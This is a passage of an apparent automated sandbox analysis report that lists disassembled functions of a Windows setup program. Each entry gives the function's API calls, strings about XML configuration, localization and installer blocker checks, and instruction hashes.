                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                              • API String ID: 3627190661-2525052916
                                                              • Opcode ID: 06512d0ecd5bcb0522dd2401b1875202f870f709546aac25240a1b57bd38716a
                                                              • Instruction ID: 8c05ce82fb132ce5f1d81e57c7bc89fb13609566d91fe499e596bdeaadc26651
                                                              • Opcode Fuzzy Hash: 06512d0ecd5bcb0522dd2401b1875202f870f709546aac25240a1b57bd38716a
                                                              • Instruction Fuzzy Hash: 1E616072902149EFDB00DBE8C884EEEBBB8AF19308F14455EF150A7791D774DA498BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C934509 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 162COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C934510
                                                              • __EH_prolog3.LIBCMT ref: 6C934689
                                                                • Part of subcall function 6C94FF21: _wcsnlen.LIBCMT ref: 6C94FF54
                                                                • Part of subcall function 6C94FF21: _memcpy_s.LIBCMT ref: 6C94FF8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3H_prolog3__memcpy_s_wcsnlen
                                                              • String ID: #(loc.$&amp;$&apos;$&gt;$&lt;$&quot;
                                                              • API String ID: 1381108809-1774302600
                                                              • Opcode ID: a3b447e6691104f3e0011f48ec2441c33f5ae50a26cd8d6abcd3975a0377923d
                                                              • Instruction ID: 366328b13747a10e0cbd99609f03eb474b3b02851bb3305688419e0e3cf46264
                                                              • Opcode Fuzzy Hash: a3b447e6691104f3e0011f48ec2441c33f5ae50a26cd8d6abcd3975a0377923d
                                                              • Instruction Fuzzy Hash: 12516C71A002089FDB00DFE8C845AEDB7B5BF29318F10455AE410EBB90DB35DA19CBA9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9451C0 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C9451C7
                                                              • CoInitialize.OLE32(00000000), ref: 6C9451DC
                                                                • Part of subcall function 6C968859: SysStringByteLen.OLEAUT32(00000000), ref: 6C968860
                                                                • Part of subcall function 6C968859: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 6C968869
                                                                • Part of subcall function 6C91B00D: __EH_prolog3.LIBCMT ref: 6C91B014
                                                                • Part of subcall function 6C91B00D: SysFreeString.OLEAUT32(?), ref: 6C91B044
                                                              • CoUninitialize.OLE32(?,?,?,00000000,?,?,?,?,?,ParameterInfo.xml,?,00000000,?,?,ParameterInfo.xml), ref: 6C945389
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A6DB: __EH_prolog3.LIBCMT ref: 6C91A6E2
                                                                • Part of subcall function 6C91A6DB: SysFreeString.OLEAUT32(?), ref: 6C91A72B
                                                                • Part of subcall function 6C91A7C3: __EH_prolog3.LIBCMT ref: 6C91A7CA
                                                              • __CxxThrowException@8.LIBCMT ref: 6C945343
                                                              Strings
                                                              • #(loc., xrefs: 6C9452B7
                                                              • ParameterInfo.xml, xrefs: 6C9452FE
                                                              • //BlockIf[@ID], xrefs: 6C945218
                                                              • BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID=", xrefs: 6C9452CB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3String$ByteFree$AllocException@8H_prolog3_catchInitializeThrowUninitialize
                                                              • String ID: #(loc.$//BlockIf[@ID]$BlockIf/@ID cannot contain any token (#(loc.[Name]) references. BlockIf/@ID="$ParameterInfo.xml
                                                              • API String ID: 3727013976-3244902561
                                                              • Opcode ID: 98a130b733b4266212a6d09affa32c0867ed2987a68c5fe8b7963352ff3cc34b
                                                              • Instruction ID: 5739b945d6d8f0255ca387ce5d4f0dae30a71f647f753cd7eb286f8faa294696
                                                              • Opcode Fuzzy Hash: 98a130b733b4266212a6d09affa32c0867ed2987a68c5fe8b7963352ff3cc34b
                                                              • Instruction Fuzzy Hash: D2518371D0414CDFCB04DBE8C984ADDBBB9AF25318F148559E125E7B80CB34DA4ACB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9250D5 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 140comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3_catch.LIBCMT ref: 6C9250DC
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C948380: __EH_prolog3.LIBCMT ref: 6C948387
                                                                • Part of subcall function 6C91388B: __EH_prolog3.LIBCMT ref: 6C913892
                                                              • CoInitialize.OLE32(00000000), ref: 6C92512A
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,00000738,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C925148
                                                              • __CxxThrowException@8.LIBCMT ref: 6C925270
                                                                • Part of subcall function 6C9254B1: __EH_prolog3.LIBCMT ref: 6C9254B8
                                                                • Part of subcall function 6C9254B1: __CxxThrowException@8.LIBCMT ref: 6C925540
                                                              • CoUninitialize.OLE32(02642228,?,succeeded,?,?,?,00000000,?,?,?,512AC3CC,?,?,?), ref: 6C9251E6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw$CreateH_prolog3_catchInitializeInstanceUninitialize
                                                              • String ID: IronMan::LocalizedData::CreateLocalizedData$succeeded$threw exception
                                                              • API String ID: 4097945976-352736096
                                                              • Opcode ID: dec8593c036ee750f1f520ad5445c1fd8f41e1c39c2aa5aa30c20a67b2d4925b
                                                              • Instruction ID: 43142dd5408a699e47e9310da72ef05013bdcef963ea0cefdf1fd89af7a2f764
                                                              • Opcode Fuzzy Hash: dec8593c036ee750f1f520ad5445c1fd8f41e1c39c2aa5aa30c20a67b2d4925b
                                                              • Instruction Fuzzy Hash: F6516D70A0124DEFCB01CFA4C884EDE7BB9AF69318F148549F115EBA95C734DA45CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9177AF Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00020019,?,?,6C94831D,00000000), ref: 6C9177E8
                                                              • RegCreateKeyExW.KERNEL32(80000002,System\CurrentControlSet\Services\Eventlog\Application\VSSetup,00000000,00000000,00000000,00020006,00000000,?,00000000,?,6C94831D,00000000), ref: 6C917805
                                                                • Part of subcall function 6C91787B: __EH_prolog3.LIBCMT ref: 6C917882
                                                                • Part of subcall function 6C91787B: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C91781A,?,6C94831D,00000000), ref: 6C9178B2
                                                                • Part of subcall function 6C91787B: RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C94831D,00000000), ref: 6C9178D8
                                                                • Part of subcall function 6C91787B: RegCloseKey.ADVAPI32(?,?,6C94831D,00000000), ref: 6C9178E4
                                                                • Part of subcall function 6C91787B: GetFileAttributesW.KERNEL32(?,?,6C94831D,00000000), ref: 6C9178F9
                                                              • RegSetValueExW.KERNEL32(?,EventMessageFile,00000000,00000002,?,00000208,?,6C94831D,00000000), ref: 6C917836
                                                              • RegSetValueExW.KERNEL32(?,TypesSupported,00000000,00000004,?,00000004,?,6C94831D,00000000), ref: 6C917859
                                                              • RegCloseKey.KERNEL32(?,?,6C94831D,00000000), ref: 6C917861
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Value$CloseOpen$AttributesCreateFileH_prolog3Query
                                                              • String ID: EventMessageFile$System\CurrentControlSet\Services\Eventlog\Application\VSSetup$TypesSupported
                                                              • API String ID: 4021642227-369282485
                                                              • Opcode ID: e0b9e7d1cc4821b49794f2d50183b17a9617176aa1bc5c9ad059eb9eb1ea6e69
                                                              • Instruction ID: 66ec309fc4d0d06bfb77fb03e21889046ee999c6c5e1b61314499d3dccb6f6e9
                                                              • Opcode Fuzzy Hash: e0b9e7d1cc4821b49794f2d50183b17a9617176aa1bc5c9ad059eb9eb1ea6e69
                                                              • Instruction Fuzzy Hash: AE1198B164122CBBDB309B52DC8DFEBBF7DEF95794F4004A5B52CA2540C6709E44DAA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C96DB02 Relevance: 13.7, APIs: 9, Instructions: 196COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStartupInfoW.KERNEL32(?,6C96C0C9), ref: 6C96DB0F
                                                              • __calloc_crt.LIBCMT ref: 6C96DB1B
                                                                • Part of subcall function 6C96D761: Sleep.KERNEL32(00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96D789
                                                              • __calloc_crt.LIBCMT ref: 6C96DBBB
                                                              • GetFileType.KERNEL32(?,00000001,6C96C0C9), ref: 6C96DC42
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt$FileInfoSleepStartupType
                                                              • String ID:
                                                              • API String ID: 591920814-0
                                                              • Opcode ID: 5b1da16e93de55a24ef522f83c467984e70bd2472e112fe33efcf4a9f9e223f7
                                                              • Instruction ID: 8ec7510c81da9601f51d2c69a6bf7098d84342c67b925d43b061d3c8bb117f2f
                                                              • Opcode Fuzzy Hash: 5b1da16e93de55a24ef522f83c467984e70bd2472e112fe33efcf4a9f9e223f7
                                                              • Instruction Fuzzy Hash: F8611DB2A093058FE7108FAAC888B197BB4AF56328F364668C576CBFD1E775D405CB40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C4AA311 Relevance: 13.7, APIs: 9, Instructions: 196COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStartupInfoW.KERNEL32(6C4814A0,6C4A91D6), ref: 6C4AA31E
                                                              • __calloc_crt.LIBCMT ref: 6C4AA32A
                                                                • Part of subcall function 6C4A9F70: Sleep.KERNEL32(00000000,?,6C4A91D6,?), ref: 6C4A9F98
                                                              • __calloc_crt.LIBCMT ref: 6C4AA3CA
                                                              • GetFileType.KERNEL32(74C08559,00000001,6C4A91D6), ref: 6C4AA451
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt$FileInfoSleepStartupType
                                                              • String ID:
                                                              • API String ID: 591920814-0
                                                              • Opcode ID: 841241bdeccea425817de42a8113a2f3073abe3532ffacacb65aaf76273fe323
                                                              • Instruction ID: 94b256c09a0807835f1076a1cfcf1ba0ebaca6903ba29d2fd867c1f21e38b48c
                                                              • Opcode Fuzzy Hash: 841241bdeccea425817de42a8113a2f3073abe3532ffacacb65aaf76273fe323
                                                              • Instruction Fuzzy Hash: FD610171A093018FD700CBA9C888F697BB4AF66339F244768E5669B6E5D330D806CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91B31F Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91B326
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91B25F: __EH_prolog3.LIBCMT ref: 6C91B266
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91B5A8
                                                              Strings
                                                              • The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit, xrefs: 6C91B546
                                                              • No DisabledCommandLineSwitches block was specified, xrefs: 6C91B5C8
                                                              • DisabledCommandLineSwitches, xrefs: 6C91B353
                                                              • ParameterInfo.xml, xrefs: 6C91B554
                                                              • Disabled CommandLineSwitch added: , xrefs: 6C91B406, 6C91B4C5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: Disabled CommandLineSwitch added: $DisabledCommandLineSwitches$No DisabledCommandLineSwitches block was specified$ParameterInfo.xml$The DisabledCommandLineSwitches block has no CommandLineSwitches specified - either add them or remove the DisabledCommandLineSwit
                                                              • API String ID: 2489616738-1449725936
                                                              • Opcode ID: 4a963fbd607b7e561991004ec76511bda89cee469636587045ff6b6fa42b323c
                                                              • Instruction ID: a111cd867263a9737a6d9cfe18140c8e8d4e7c97970ccbcfcb13842651cbe0ab
                                                              • Opcode Fuzzy Hash: 4a963fbd607b7e561991004ec76511bda89cee469636587045ff6b6fa42b323c
                                                              • Instruction Fuzzy Hash: D2A16F71904249DFCB01CFA8C985AEEBBBABFA5308F244559E015EBB90D731DE45CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9249CE Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9249D5
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              • __CxxThrowException@8.LIBCMT ref: 6C924A3C
                                                                • Part of subcall function 6C9714AA: KiUserExceptionDispatcher.NTDLL(?,?,6C96C129,00000C00,?,?,?,?,6C96C129,00000C00,6C98BA3C,6C9A76D4,00000C00,00000020,6C94F845,?), ref: 6C9714EC
                                                                • Part of subcall function 6C9195C1: __EH_prolog3.LIBCMT ref: 6C9195C8
                                                                • Part of subcall function 6C9195C1: VariantInit.OLEAUT32(?), ref: 6C9195DB
                                                                • Part of subcall function 6C9195C1: SysFreeString.OLEAUT32(?), ref: 6C91960E
                                                                • Part of subcall function 6C9195C1: VariantClear.OLEAUT32(00000008), ref: 6C91962E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Variant$ClearDispatcherExceptionException@8FreeInitStringThrowUser
                                                              • String ID: Language$LocalizedText$Text$Unable to find Language element for LangID="%d" in localized data$W
                                                              • API String ID: 452683132-1012890799
                                                              • Opcode ID: 24eabfdf42dbfae095092fbb3e231573396af2e3890386f5bd5fda36015add99
                                                              • Instruction ID: aca38d1e343ea99e009cdd122e745144c0c49958a7973731283771ce44956a85
                                                              • Opcode Fuzzy Hash: 24eabfdf42dbfae095092fbb3e231573396af2e3890386f5bd5fda36015add99
                                                              • Instruction Fuzzy Hash: 3F916D71901209EFCB05CFA8C844ADDBBB9AF59718F24854AF410EB785C735DA45CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C939048 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 175COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C922E48: __EH_prolog3.LIBCMT ref: 6C922E4F
                                                              • __CxxThrowException@8.LIBCMT ref: 6C9391B1
                                                              Strings
                                                              • Global Block Checks, xrefs: 6C939087, 6C9390B7
                                                              • Checking for global blockers, xrefs: 6C9390A8
                                                              • : StopBlockers evaluated to true., xrefs: 6C939209
                                                              • : SuccessBlockers evaluated to true., xrefs: 6C9391E8
                                                              • no blocking conditions found, xrefs: 6C939078
                                                              • : WarnBlockers evaluated to true., xrefs: 6C93921D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8Throw
                                                              • String ID: no blocking conditions found$: StopBlockers evaluated to true.$: SuccessBlockers evaluated to true.$: WarnBlockers evaluated to true.$Checking for global blockers$Global Block Checks
                                                              • API String ID: 2489616738-2937627051
                                                              • Opcode ID: e7586ca84de2bc271d1e2346761065997b2ab864856f67364ec89177de147283
                                                              • Instruction ID: 2cdb2a4d2bb215b2629d9eb519130bb8033eb4c4b10fc87daa88c46357860929
                                                              • Opcode Fuzzy Hash: e7586ca84de2bc271d1e2346761065997b2ab864856f67364ec89177de147283
                                                              • Instruction Fuzzy Hash: 797156B1408785AFC720CF59C884A4BBBE8BB99318F404E1EF19983B50D775E949CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C9238A1 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C9238A8
                                                                • Part of subcall function 6C918D44: __EH_prolog3.LIBCMT ref: 6C918D4B
                                                                • Part of subcall function 6C923480: __EH_prolog3.LIBCMT ref: 6C923487
                                                              Strings
                                                              • ParameterInfo.xml, xrefs: 6C9238E3
                                                              • The mapping element defined: , xrefs: 6C923951
                                                              • Create CustomErrorRetry object, xrefs: 6C92399C
                                                              • Create CustomErrorMappingBase object, xrefs: 6C923A51
                                                              • Retry, xrefs: 6C923983, 6C9239B9
                                                              • schema validation failure: More than 1 CustomError Mapping block defined., xrefs: 6C9238D1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: Create CustomErrorMappingBase object$Create CustomErrorRetry object$ParameterInfo.xml$Retry$The mapping element defined: $schema validation failure: More than 1 CustomError Mapping block defined.
                                                              • API String ID: 431132790-1753673958
                                                              • Opcode ID: 2dc957b19f331d25dbb91150e35a7390fbe9cc8db12f8b484eb88e4c4abd3ad4
                                                              • Instruction ID: 30114bce0b39f4c5fb68c3c5ec0878427f500dda2844c0c766e1da5ac84e58fb
                                                              • Opcode Fuzzy Hash: 2dc957b19f331d25dbb91150e35a7390fbe9cc8db12f8b484eb88e4c4abd3ad4
                                                              • Instruction Fuzzy Hash: B7518E719102099BDF14CBB8C945BEEB7F8BF29318F104659E064EBB84CB38D905CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C91B00D Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 152COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91B014
                                                                • Part of subcall function 6C9491AF: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,6C91B029,?,0000002C,6C95D55B,?,?,?,?,00000001), ref: 6C9491C5
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91B044
                                                              • __CxxThrowException@8.LIBCMT ref: 6C91B128
                                                              • SysFreeString.OLEAUT32(?), ref: 6C91B163
                                                                • Part of subcall function 6C9139AD: __EH_prolog3.LIBCMT ref: 6C9139B4
                                                              Strings
                                                              • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 6C91B0F6
                                                              • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 6C91B033
                                                              • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 6C91B1CB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: FreeH_prolog3String$CreateException@8InstanceThrow
                                                              • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                              • API String ID: 1763430278-2525052916
                                                              • Opcode ID: 9462a8ec30768ae9c5a5531bcaa76828469cc8fcbd9d56bbcfe123b9a6e9095d
                                                              • Instruction ID: e7d079ad0d3cc7750df4fbeef0e43894b24e494195c822156fef12c8286672f1
                                                              • Opcode Fuzzy Hash: 9462a8ec30768ae9c5a5531bcaa76828469cc8fcbd9d56bbcfe123b9a6e9095d
                                                              • Instruction Fuzzy Hash: CA519F72804149EFCB00DFE8C885DEEBBB9BF29318F154559E111A7B80DB34DA49CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 6C952C16 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 6C918168: GetFileSize.KERNEL32(?,?,?,?,?,6C943B9F,?,?,00000000,?,?,?,?,00000008,6C94EC79,?), ref: 6C918178
                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 6C952CA8
                                                              • __CxxThrowException@8.LIBCMT ref: 6C952CE7
                                                              • CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 6C952D19
                                                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 6C952D32
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C918329: __EH_prolog3.LIBCMT ref: 6C918330
                                                              Strings
                                                              Memory Dump Source
